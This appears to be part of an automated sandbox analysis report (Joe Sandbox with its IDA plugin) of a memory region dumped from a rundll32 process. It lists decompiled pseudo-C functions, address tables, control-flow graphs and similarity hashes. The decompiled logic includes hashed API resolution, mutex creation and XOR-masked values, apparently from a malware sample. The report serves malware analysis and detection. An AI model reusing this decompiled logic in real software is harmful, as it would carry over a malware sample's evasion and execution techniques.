                          				 *0x21DD9341048 = _t55;
                          				 *0xd933d458 = 0xd9341040; // executed
                          				_t30 = E0000021D21DD93337E0(0xd9341040, _t82, _t90); // executed
                          				return _t30;
                          			}

















                          0x21dd9334db4
                          0x21dd9334db4
                          0x21dd9334db7
                          0x21dd9334dbb
                          0x21dd9334dbf
                          0x21dd9334dc3
                          0x21dd9334dd1
                          0x21dd9334dd4
                          0x21dd9334de3
                          0x21dd9334def
                          0x21dd9334dfb
                          0x21dd9334e02
                          0x21dd9334e07
                          0x21dd9334e0b
                          0x21dd9334e16
                          0x21dd9334e18
                          0x21dd9334e1c
                          0x21dd9334e20
                          0x21dd9334e24
                          0x21dd9334e26
                          0x21dd9334e2a
                          0x21dd9334e31
                          0x21dd9334e3a
                          0x21dd9334e3d
                          0x21dd9334e49
                          0x21dd9334e4e
                          0x21dd9334e51
                          0x21dd9334e5a
                          0x21dd9334e5f
                          0x21dd9334e75
                          0x21dd9334e85
                          0x21dd9334e8b
                          0x21dd9334e92
                          0x21dd9334e9b
                          0x21dd9334ea0
                          0x21dd9334ea6
                          0x21dd9334ec3
                          0x21dd9334ecf
                          0x21dd9334ed4
                          0x21dd9334edf
                          0x21dd9334ee9
                          0x21dd9334eee
                          0x21dd9334ef5
                          0x21dd9334efc
                          0x21dd9334f23

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$AllocDestroy$Create
                          • String ID: .bss
                          • API String ID: 388876957-3890483948
                          • Opcode ID: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                          • Instruction ID: 31c8343184b9acdb7c9b06018e35c8bf1b253645ae4099fc11fbcfae063a10d4
                          • Opcode Fuzzy Hash: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                          • Instruction Fuzzy Hash: 06419E37740780C6FB18CF56B94839A77A1F7A8B94F04A125DE49477A8DF3AD895C300
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 19%
                          			E0000021D21DD933A238(void* __ecx, void* __edi, void* __ebp, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __r8, void* __r9, void* _a8, long long* _a24, char _a32) {
                          				char _v72;
                          				char _v80;
                          				char _v88;
                          				long long _v104;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t41;
                          				void* _t43;
                          				long long* _t82;
                          				long long _t83;
                          				long long _t84;
                          				intOrPtr _t108;
                          				void* _t109;
                          				intOrPtr _t110;
                          				void* _t112;
                          				void* _t115;
                          				long long* _t118;
                          				void* _t130;
                          				long _t133;
                          				void* _t134;
                          				long _t136;
                          				void* _t139;
                          
                          				_t84 = __rbx;
                          				_t82 = _t118;
                          				 *((long long*)(_t82 + 8)) = __rbx;
                          				 *((long long*)(_t82 + 0x18)) = __r8;
                          				_t3 = _t82 + 0x20; // 0xfb849fa7
                          				_t134 = __rcx;
                          				E0000021D21DD93324B0(__rbx, _t3, _t112); // executed
                          				if (_t82 == 0) goto 0xd933a3dc;
                          				E0000021D21DD933908C(0xfb849f8f, _t82,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t82 == 0) goto 0xd933a29f;
                          				_v88 =  *_t82();
                          				goto 0xd933a2a5;
                          				_v88 = 0;
                          				_t10 = _t82 + 1; // 0x1
                          				r8d = _t109 + _t10;
                          				HeapAlloc(_t139, _t136, _t133);
                          				_v80 = _t82;
                          				if (_t82 == 0) goto 0xd933a3ce;
                          				0xd93347b0();
                          				_t13 = _t109 + 1; // 0x1
                          				r8d = _t13;
                          				0xd93347b0();
                          				E0000021D21DD933908C(0xfb849f8f, _t82,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t82 == 0) goto 0xd933a30d;
                          				 *_t82();
                          				goto 0xd933a30f;
                          				_t16 =  &_a32; // 0xfb84a007
                          				_t17 =  &_v72; // 0xfb849f9f
                          				r8d = 0;
                          				_v104 = _t16;
                          				_t41 = E0000021D21DD9337CF4(_t82, _t84, _t134, _t82,  *((intOrPtr*)( *0xd933d458 + 8)), _t17, _t130, _t109); // executed
                          				HeapFree(??, ??, ??);
                          				if (_t41 != 0) goto 0xd933a3ce;
                          				r8d = _a32;
                          				_t108 = _v72;
                          				_t21 =  &_v88; // 0xfb849f8f
                          				_t83 = _t21;
                          				_t22 =  &_v80; // 0xfb849f87
                          				_v104 = _t83;
                          				_t43 = E0000021D21DD93352B8(_t84, _t108, _t82,  *((intOrPtr*)( *0xd933d458 + 8)), _t22, _t112, _t115);
                          				_t110 = _v80;
                          				if (_v88 == 0) goto 0xd933a389;
                          				if ( *((char*)(_t108 + _t110)) != 0x3d) goto 0xd933a389;
                          				if (_t134 - 1 != 0) goto 0xd933a37a;
                          				 *((char*)(_t83 + _t110)) = 0;
                          				if (_t43 != 0) goto 0xd933a3b0;
                          				E0000021D21DD9337500(_t84, _t110, _t108, _t110, _t82,  *((intOrPtr*)( *0xd933d458 + 8)));
                          				if (_t83 != 0) goto 0xd933a3a5;
                          				_t29 = _t83 + 8; // 0x8
                          				goto 0xd933a3b0;
                          				 *_a24 = _t83;
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				return _t29;
                          			}


























                          0x21dd933a238
                          0x21dd933a238
                          0x21dd933a23b
                          0x21dd933a23f
                          0x21dd933a25c
                          0x21dd933a265
                          0x21dd933a26d
                          0x21dd933a278
                          0x21dd933a288
                          0x21dd933a290
                          0x21dd933a299
                          0x21dd933a29d
                          0x21dd933a2a1
                          0x21dd933a2b1
                          0x21dd933a2b1
                          0x21dd933a2b6
                          0x21dd933a2bf
                          0x21dd933a2c7
                          0x21dd933a2dd
                          0x21dd933a2e2
                          0x21dd933a2e2
                          0x21dd933a2ed
                          0x21dd933a2fc
                          0x21dd933a304
                          0x21dd933a309
                          0x21dd933a30b
                          0x21dd933a30f
                          0x21dd933a317
                          0x21dd933a31c
                          0x21dd933a31f
                          0x21dd933a32a
                          0x21dd933a339
                          0x21dd933a341
                          0x21dd933a347
                          0x21dd933a34f
                          0x21dd933a354
                          0x21dd933a354
                          0x21dd933a359
                          0x21dd933a361
                          0x21dd933a366
                          0x21dd933a36f
                          0x21dd933a378
                          0x21dd933a381
                          0x21dd933a387
                          0x21dd933a38b
                          0x21dd933a391
                          0x21dd933a396
                          0x21dd933a39e
                          0x21dd933a3a0
                          0x21dd933a3a3
                          0x21dd933a3ad
                          0x21dd933a3b8
                          0x21dd933a3c8
                          0x21dd933a3d6
                          0x21dd933a3f5

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Free$Alloc$ErrorLast
                          • String ID:
                          • API String ID: 1659099196-0
                          • Opcode ID: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                          • Instruction ID: b28179888becee302b3626ade42dcd77632fffab6c1eccab112b90f3c4db404c
                          • Opcode Fuzzy Hash: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                          • Instruction Fuzzy Hash: CB417C333457C0DAEB58EF56B44879A77A1BBE9BD4F049025AE4E83769EF3AC4058700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 351 21dd9332dc4-21dd9332e1a call 21dd9334320 354 21dd9332e1c-21dd9332e27 351->354 355 21dd9332e29-21dd9332e2e 351->355 356 21dd9332e34-21dd9332e50 call 21dd9334880 354->356 355->356 359 21dd9332f94-21dd9332f9a 356->359 360 21dd9332e56-21dd9332e6c 356->360 363 21dd9332fc2 359->363 364 21dd9332f9c-21dd9332faa call 21dd93347b8 359->364 361 21dd9332e6e-21dd9332e88 360->361 362 21dd9332e8d-21dd9332ece call 21dd9331bfc 360->362 361->362 369 21dd9332ed3-21dd9332ee8 HeapFree 362->369 365 21dd9332fc7 363->365 375 21dd9332faf-21dd9332fb1 364->375 368 21dd9332fcd-21dd9332fd1 365->368 371 21dd933302f-21dd9333032 368->371 372 21dd9332fd3-21dd9332fe4 call 21dd933908c 368->372 373 21dd9332f01-21dd9332f03 369->373 374 21dd9332eea-21dd9332eec 369->374 376 21dd933308e-21dd93330a0 371->376 377 21dd9333034-21dd9333044 HeapFree 371->377 390 21dd9332fed-21dd9332ff0 372->390 391 21dd9332fe6 372->391 373->359 378 21dd9332f09-21dd9332f46 call 21dd9336c1c call 21dd9337b6c 373->378 380 21dd9332eee-21dd9332ef4 374->380 381 21dd9332ef6-21dd9332efc call 21dd933a3f8 374->381 375->368 382 21dd9332fb3-21dd9332fc0 375->382 383 21dd933304e-21dd933305f call 21dd933908c 377->383 384 21dd9333046-21dd933304c 377->384 400 21dd9332f71-21dd9332f92 HeapFree call 21dd93347b8 378->400 401 21dd9332f48-21dd9332f6d 378->401 380->373 380->381 381->373 382->368 397 21dd9333061 383->397 398 21dd9333067-21dd9333086 call 21dd933908c 383->398 384->376 384->383 394 21dd9332ff2-21dd9332ffb 390->394 395 21dd933301c-21dd933302b 390->395 391->390 394->395 399 21dd9332ffd-21dd933300d call 21dd93347b8 394->399 395->371 397->398 398->376 409 21dd9333088 398->409 399->395 410 21dd933300f-21dd9333017 399->410 400->375 401->368 404 21dd9332f6f 401->404 404->365 409->376 410->395
                          C-Code - Quality: 41%
                          			E0000021D21DD9332DC4(void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
                          				intOrPtr _v88;
                          				void* _v96;
                          				void* _v104;
                          				long long _v112;
                          				signed int _v120;
                          				long long _v128;
                          				long long _v136;
                          				void* __rbx;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				signed int _t72;
                          				void* _t77;
                          				signed int _t80;
                          				void* _t81;
                          				void* _t97;
                          				signed int _t98;
                          				void* _t99;
                          				void* _t114;
                          				long long* _t139;
                          				signed long long _t140;
                          				long long* _t142;
                          				void* _t143;
                          				void* _t169;
                          				void* _t170;
                          				void* _t172;
                          				signed int _t173;
                          				long _t177;
                          				void* _t179;
                          				void* _t190;
                          				void* _t191;
                          				void* _t192;
                          				signed int* _t193;
                          				long long _t194;
                          				void* _t200;
                          				long _t202;
                          				void* _t205;
                          
                          				_t191 = _t179;
                          				 *((long long*)(_t191 + 0x18)) = __r8;
                          				 *((long long*)(_t191 + 0x10)) = __rdx;
                          				_t203 =  *0xd933d458;
                          				 *(_t191 + 0x20) =  *(_t191 + 0x20) & 0x00000000;
                          				_t170 = __rcx;
                          				_v120 =  *0xd933d450;
                          				r15d = 0;
                          				 *(_t191 - 0x60) =  *(_t191 - 0x60) & _t205;
                          				_v112 =  *((intOrPtr*)( *0xd933d458 + 8));
                          				if (E0000021D21DD9334320(_t143, __rcx, _t191 - 0x68, __rcx, _t172, _t191 + 8) == 0) goto 0xd9332e29;
                          				_t12 = _t205 + 1; // 0x1
                          				r12d = _t12;
                          				_v104 = _t172;
                          				goto 0xd9332e34;
                          				_t173 = _v104;
                          				r12d = 2;
                          				_t15 =  &_a32; // 0xca
                          				if (E0000021D21DD9334880(r12d, _t114,  *((intOrPtr*)( *0xd933d458 + 8)), _t143, _t170,  &_v96, _t15) != 0) goto 0xd9332f94;
                          				r8d = _a32;
                          				r13d = r8d;
                          				r13d = r13d - r12d;
                          				_t193 = _v96;
                          				if (_t173 == 0) goto 0xd9332e8d;
                          				_t72 = _a8;
                          				_t193[0xa] = 1;
                          				_t193[0x12] = _t173;
                          				_t193[0xd] = _t72;
                          				_t193[0x10] = _t72;
                          				_t25 = _t170 + 0xc0; // 0xc0
                          				r9d = 0;
                          				 *_t193 = _v120 ^ 0x62ade362;
                          				_t193[3] =  *(_t170 + 0x48);
                          				_t193[2] =  *(_t170 + 0x4c);
                          				_t30 =  &_a8; // 0xb2
                          				_v128 = _t30;
                          				_t32 =  &_v120; // 0x32
                          				_v136 = _t32;
                          				_t77 = E0000021D21DD9331BFC(_t32, _t143, _t25, _t193); // executed
                          				_t97 = _t77;
                          				HeapFree(_t205, _t202, _t200);
                          				if (r13d == 0) goto 0xd9332f01;
                          				if (_t97 == 0) goto 0xd9332ef6;
                          				if (_t97 != 0x10d2) goto 0xd9332f01;
                          				E0000021D21DD933A3F8(r13d, _t32, _t143, _t170, _t173, _t177, _t192, _t169);
                          				if (_t97 != 0) goto 0xd9332f94;
                          				_t98 = _a8;
                          				_t194 = _v120;
                          				r13d =  *(_t170 + 0x4c);
                          				_t80 = E0000021D21DD9336C1C(_t98, _t194);
                          				_t38 =  &_a8; // 0xb2
                          				r9d = 1;
                          				 *(_t170 + 0x48) = _t98;
                          				 *(_t170 + 0x4c) = _t80;
                          				_t81 = E0000021D21DD9337B6C(_t143, _t170, _t194, _t173, _t177, _t38, _t190, _t191);
                          				_t99 = _t81;
                          				if (_t81 != 0) goto 0xd9332f71;
                          				_t139 = _a16;
                          				 *_t139 = _t194;
                          				 *_a24 = _a8;
                          				if ( *(_t170 + 0x4c) != r13d) goto 0xd9332fcd;
                          				goto 0xd9332fc7;
                          				HeapFree(_t172, _t177, _t143);
                          				_t47 = _t170 + 0xc0; // 0xc0
                          				E0000021D21DD93347B8(_t99, _t139, _t143, _t47, _t177);
                          				goto 0xd9332faf;
                          				if (_t99 == 0x10d2) goto 0xd9332fc2;
                          				_t48 = _t170 + 0xc0; // 0xc0
                          				if (E0000021D21DD93347B8(_t99, _t139, _t143, _t48, _t177) != 0) goto 0xd9332fcd;
                          				asm("lock or dword [edi+0xec], 0x1");
                          				goto 0xd9332fcd;
                          				r15d = 1;
                          				if ( *((intOrPtr*)(_t170 + 0x60)) == 0) goto 0xd933302f;
                          				E0000021D21DD933908C(0x9c66d81c, _t139,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t139 == 0) goto 0xd9332fed;
                          				 *_t139();
                          				if (r15d == 0) goto 0xd933301c;
                          				_t140 =  *((intOrPtr*)(_t170 + 0x58));
                          				if (_v88 - _t140 <= 0) goto 0xd933301c;
                          				_t57 = _t170 + 0xc0; // 0xc1
                          				if (E0000021D21DD93347B8(_t99, _t140, _t143, _t57, _t177) != 0) goto 0xd933301c;
                          				asm("lock or dword [edi+0xec], 0x1");
                          				_t142 = _t140 * 0x23c34600 + _v88;
                          				 *((long long*)(_t170 + 0x58)) = _t142;
                          				if (_v104 == 0) goto 0xd933308e;
                          				HeapFree(??, ??, ??);
                          				if (_t99 == 0) goto 0xd933304e;
                          				if (_t99 != 0x10d2) goto 0xd933308e;
                          				E0000021D21DD933908C(0x4a75e5e7, _t142,  *((intOrPtr*)( *0xd933d458 + 0x10)));
                          				if (_t142 == 0) goto 0xd9333067;
                          				 *_t142();
                          				 *(_t170 + 0x98) =  *(_t170 + 0x98) & 0x00000000;
                          				 *(_t170 + 0x9c) =  *(_t170 + 0x9c) & 0x00000000;
                          				E0000021D21DD933908C(0x8d72aad2, _t142,  *((intOrPtr*)(_t203 + 0x10)));
                          				if (_t142 == 0) goto 0xd933308e;
                          				 *_t142();
                          				return _t99;
                          			}








































                          0x21dd9332dc4
                          0x21dd9332dc7
                          0x21dd9332dcb
                          0x21dd9332ddf
                          0x21dd9332de6
                          0x21dd9332deb
                          0x21dd9332dfc
                          0x21dd9332e04
                          0x21dd9332e07
                          0x21dd9332e0e
                          0x21dd9332e1a
                          0x21dd9332e1e
                          0x21dd9332e1e
                          0x21dd9332e22
                          0x21dd9332e27
                          0x21dd9332e29
                          0x21dd9332e2e
                          0x21dd9332e34
                          0x21dd9332e50
                          0x21dd9332e56
                          0x21dd9332e5e
                          0x21dd9332e61
                          0x21dd9332e64
                          0x21dd9332e6c
                          0x21dd9332e6e
                          0x21dd9332e75
                          0x21dd9332e7e
                          0x21dd9332e83
                          0x21dd9332e88
                          0x21dd9332e91
                          0x21dd9332e98
                          0x21dd9332ea3
                          0x21dd9332eaa
                          0x21dd9332eb2
                          0x21dd9332eb7
                          0x21dd9332ebf
                          0x21dd9332ec4
                          0x21dd9332ec9
                          0x21dd9332ece
                          0x21dd9332edd
                          0x21dd9332edf
                          0x21dd9332ee8
                          0x21dd9332eec
                          0x21dd9332ef4
                          0x21dd9332efc
                          0x21dd9332f03
                          0x21dd9332f09
                          0x21dd9332f10
                          0x21dd9332f15
                          0x21dd9332f1e
                          0x21dd9332f23
                          0x21dd9332f2b
                          0x21dd9332f37
                          0x21dd9332f3a
                          0x21dd9332f3d
                          0x21dd9332f42
                          0x21dd9332f46
                          0x21dd9332f48
                          0x21dd9332f58
                          0x21dd9332f67
                          0x21dd9332f6d
                          0x21dd9332f6f
                          0x21dd9332f7e
                          0x21dd9332f84
                          0x21dd9332f8d
                          0x21dd9332f92
                          0x21dd9332f9a
                          0x21dd9332f9c
                          0x21dd9332fb1
                          0x21dd9332fb3
                          0x21dd9332fc0
                          0x21dd9332fc7
                          0x21dd9332fd1
                          0x21dd9332fdc
                          0x21dd9332fe4
                          0x21dd9332feb
                          0x21dd9332ff0
                          0x21dd9332ff2
                          0x21dd9332ffb
                          0x21dd9332ffd
                          0x21dd933300d
                          0x21dd933300f
                          0x21dd9333026
                          0x21dd933302b
                          0x21dd9333032
                          0x21dd933303c
                          0x21dd9333044
                          0x21dd933304c
                          0x21dd9333057
                          0x21dd933305f
                          0x21dd9333065
                          0x21dd9333067
                          0x21dd933306e
                          0x21dd933307e
                          0x21dd9333086
                          0x21dd933308c
                          0x21dd93330a0

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Free$Alloc
                          • String ID: uJ
                          • API String ID: 3901518246-2850656762
                          • Opcode ID: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                          • Instruction ID: 64d0e07a571f7e2009ca251cea3c0d7c690f3279b577ea5b12cc327eec71c5a3
                          • Opcode Fuzzy Hash: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                          • Instruction Fuzzy Hash: 03816B33244B80D6EB28DF22F548BDA73A4F7A8784F405025EE5A47BA8DF3AD455CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 411 21dd9335ee8-21dd9335f0d 412 21dd9335f0f-21dd9335f20 call 21dd933908c 411->412 413 21dd9335f28-21dd9335f2d 411->413 412->413 424 21dd9335f22 412->424 415 21dd9335f2f-21dd9335f40 call 21dd933908c 413->415 416 21dd9335f48-21dd9335f4d 413->416 415->416 426 21dd9335f42 415->426 417 21dd9335f4f-21dd9335f60 call 21dd933908c 416->417 418 21dd9335f68-21dd9335f6f 416->418 417->418 430 21dd9335f62 417->430 422 21dd9335f71-21dd9335f76 HeapFree 418->422 423 21dd9335f7c-21dd9335f83 418->423 422->423 428 21dd9335f90-21dd9335f97 423->428 429 21dd9335f85-21dd9335f8a HeapFree 423->429 424->413 426->416 431 21dd9335fa4-21dd9335fab 428->431 432 21dd9335f99-21dd9335f9e HeapFree 428->432 429->428 430->418 433 21dd9335fad-21dd9335fb2 HeapFree 431->433 434 21dd9335fb8-21dd9335fc7 431->434 432->431 433->434
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: FreeHeap$ErrorLast
                          • String ID:
                          • API String ID: 2332451156-0
                          • Opcode ID: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                          • Instruction ID: 4dac3556d00c06a56c52a43d297c0e070a506cd2b328a5e22a05672545fdeb5b
                          • Opcode Fuzzy Hash: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                          • Instruction Fuzzy Hash: 60212A72241B90C1EB58DFA6F6483A963A1EB99FC4F5860159E0D537BDCF3AD881C300
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$AllocErrorFreeLast
                          • String ID: uJ
                          • API String ID: 796569475-2850656762
                          • Opcode ID: b9ef0ca706fd99b697d0d6878eb9cb5900bb783f814b50af44875247110de7d7
                          • Instruction ID: 96da28d44f3d35e5bcafc8d45a90c056d7c5a13911e7a98365643ac59225094b
                          • Opcode Fuzzy Hash: b9ef0ca706fd99b697d0d6878eb9cb5900bb783f814b50af44875247110de7d7
                          • Instruction Fuzzy Hash: B7317C37354B84D2EB18DF26F44839AA3A0F7A87D4F545521EE4A477A9DF39C845CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 19%
                          			E0000021D21DD933A7A0(void* __edi, long long* __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, void* __r9, long long _a8, char _a16, char _a24) {
                          				intOrPtr _v56;
                          				void* _v64;
                          				intOrPtr _v72;
                          				long long _v88;
                          				void* __rsi;
                          				void* __rbp;
                          				long long* _t58;
                          				long long* _t59;
                          				long long _t60;
                          				long long _t75;
                          				intOrPtr* _t87;
                          
                          				_t60 = __rbx;
                          				_t58 = __rax;
                          				_a8 = __rbx;
                          				_t76 =  *0xd933d458;
                          				_t87 = __rcx;
                          				_v72 = 0x18;
                          				_v56 = 0;
                          				E0000021D21DD933908C(0xe9f8f8df, __rax,  *((intOrPtr*)( *0xd933d458 + 0x20)));
                          				if (_t58 == __rbx) goto 0xd933a804;
                          				r9d = 0; // executed
                          				 *_t58(); // executed
                          				goto 0xd933a806;
                          				if (0 == 0) goto 0xd933a8d2;
                          				r9d = 0;
                          				_a16 =  *__rcx;
                          				_t59 =  &_a24;
                          				_v88 = _t59;
                          				E0000021D21DD9331000(__edi, _t59, __rbx,  &_a16,  *0xd933d458, 0x21dd9330000,  *0xd933d448 + 0x21dd9341178);
                          				if (_t59 == _t60) goto 0xd933a8d2;
                          				E0000021D21DD933908C(0x3ff22481, _t59,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t59 == _t60) goto 0xd933a875;
                          				CreateMutexW(??, ??, ??); // executed
                          				goto 0xd933a878;
                          				_t75 = _t60;
                          				if (_t75 == _t60) goto 0xd933a8c4;
                          				E0000021D21DD933908C(0xc06f8334, _t59,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t59 == _t60) goto 0xd933a894;
                          				 *_t59();
                          				goto 0xd933a899;
                          				if (0x7f != 0xb7) goto 0xd933a8ba;
                          				E0000021D21DD933908C(0xa219a077, _t59,  *((intOrPtr*)(_t76 + 0x18)));
                          				if (_t59 == _t60) goto 0xd933a8c4;
                          				 *_t59();
                          				goto 0xd933a8c4;
                          				 *((long long*)(_t87 + 0x18)) = _t75;
                          				HeapFree(??, ??, ??);
                          				return 1;
                          			}














                          0x21dd933a7a0
                          0x21dd933a7a0
                          0x21dd933a7a0
                          0x21dd933a7b0
                          0x21dd933a7be
                          0x21dd933a7c5
                          0x21dd933a7cf
                          0x21dd933a7dc
                          0x21dd933a7eb
                          0x21dd933a7fd
                          0x21dd933a800
                          0x21dd933a802
                          0x21dd933a808
                          0x21dd933a812
                          0x21dd933a81d
                          0x21dd933a824
                          0x21dd933a838
                          0x21dd933a83d
                          0x21dd933a848
                          0x21dd933a857
                          0x21dd933a85f
                          0x21dd933a86e
                          0x21dd933a873
                          0x21dd933a875
                          0x21dd933a87b
                          0x21dd933a886
                          0x21dd933a88e
                          0x21dd933a890
                          0x21dd933a892
                          0x21dd933a89e
                          0x21dd933a8a9
                          0x21dd933a8b1
                          0x21dd933a8b6
                          0x21dd933a8b8
                          0x21dd933a8ba
                          0x21dd933a8cc
                          0x21dd933a8e7

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: DescriptorSecurity$ConvertCreateErrorFreeHeapLastMutexString
                          • String ID:
                          • API String ID: 2454944130-0
                          • Opcode ID: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                          • Instruction ID: b5f85a402624879bbca28bad52a4f12205e85b844ac87bb23ff483c8a1756852
                          • Opcode Fuzzy Hash: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                          • Instruction Fuzzy Hash: 7131E2336442C4E6EB24EF51F0483DA77A0F3A8780F8855219E4E877ADCE39D88AC350
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 59%
                          			E0000021D21DD9335168(signed int __rbx, long long __rcx, void* __rdx, void* __r8, long long _a8, long long _a16, intOrPtr _a24, intOrPtr _a48, intOrPtr _a56, long long _a64) {
                          				long long _v72;
                          				long long _v88;
                          				void* __rsi;
                          				void* __rbp;
                          				intOrPtr _t34;
                          				void* _t43;
                          				void* _t52;
                          				intOrPtr _t60;
                          				signed long long _t77;
                          				void* _t78;
                          				void* _t92;
                          				void* _t98;
                          
                          				_t63 = __rbx;
                          				_a16 = __rbx;
                          				_a8 = __rcx;
                          				_t60 =  *0xd933d458;
                          				_t52 = r8d;
                          				_t98 = __rdx;
                          				_v72 =  *((intOrPtr*)(_t60 + 8));
                          				_t8 = _t77 + 8; // 0x8, executed
                          				r13d = _t8;
                          				HeapAlloc(??, ??, ??); // executed
                          				if (_t60 == 0) goto 0xd933529c;
                          				if (_t52 == 0) goto 0xd9335256;
                          				_t10 = _t98 + 0x20; // 0x21dd9334f21
                          				_t94 = _t10;
                          				E0000021D21DD93330A4(_t60, __rbx, __rcx, _t78, __rdx + (__rbx + __rbx * 4) * 8, _t92); // executed
                          				if (_t60 == 0) goto 0xd933524b;
                          				_t15 = _t94 - 8; // 0x5d415e4120c48348
                          				r9d =  *_t15;
                          				_v88 = _t60 + (_t77 + _t77 * 2) * 8;
                          				_t34 = E0000021D21DD9335638(_t63, _a8, _t60,  *_t10, _t92); // executed
                          				_a24 = _t34;
                          				HeapFree(??, ??, ??);
                          				if (_a24 == 0) goto 0xd933524b;
                          				if (1 - _t52 < 0) goto 0xd93351d6;
                          				r13d = 8;
                          				if (1 != _t52) goto 0xd9335284;
                          				_v88 = _a64;
                          				r13d = E0000021D21DD93392D4(1, _t43, 0 + _a24, _t63, _t60, _a48, _a56, _t92);
                          				E0000021D21DD933885C(0 + _a24, _t63, _t60, _t78);
                          				HeapFree(??, ??, ??);
                          				return r13d;
                          			}















                          0x21dd9335168
                          0x21dd9335168
                          0x21dd933516d
                          0x21dd9335181
                          0x21dd9335188
                          0x21dd933518b
                          0x21dd93351a8
                          0x21dd93351ad
                          0x21dd93351ad
                          0x21dd93351b1
                          0x21dd93351bd
                          0x21dd93351c7
                          0x21dd93351d2
                          0x21dd93351d2
                          0x21dd93351e3
                          0x21dd93351ee
                          0x21dd93351f0
                          0x21dd93351f0
                          0x21dd933520d
                          0x21dd9335212
                          0x21dd933521f
                          0x21dd9335226
                          0x21dd9335235
                          0x21dd9335249
                          0x21dd9335250
                          0x21dd9335258
                          0x21dd9335277
                          0x21dd9335281
                          0x21dd9335289
                          0x21dd9335296
                          0x21dd93352b6

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Alloc$Free$Sleep
                          • String ID:
                          • API String ID: 1163062789-0
                          • Opcode ID: 3a5c3fa052809e7fc05be192fc8f2ea2de74623612a3d96ea4b3a5664d0ead34
                          • Instruction ID: 85d075667a480f089b86f3a932763113aa455b13b7fe8b715932c30f1d01a9b8
                          • Opcode Fuzzy Hash: 3a5c3fa052809e7fc05be192fc8f2ea2de74623612a3d96ea4b3a5664d0ead34
                          • Instruction Fuzzy Hash: F0319A37600B80D6DB28DF93B8486DAA3A0F798BC8F048012EE8D83728DF38D449C700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 54%
                          			E0000021D21DD93324B0(long long __rbx, void** __rdx, long long __rsi) {
                          				signed long long _t29;
                          				void* _t50;
                          				void* _t53;
                          				long long _t71;
                          				long _t88;
                          				long long _t94;
                          				void* _t96;
                          				void* _t103;
                          				void* _t104;
                          				long _t107;
                          				long _t109;
                          				void* _t112;
                          
                          				_t73 = __rbx;
                          				_t103 = _t96;
                          				 *((long long*)(_t103 + 8)) = __rbx;
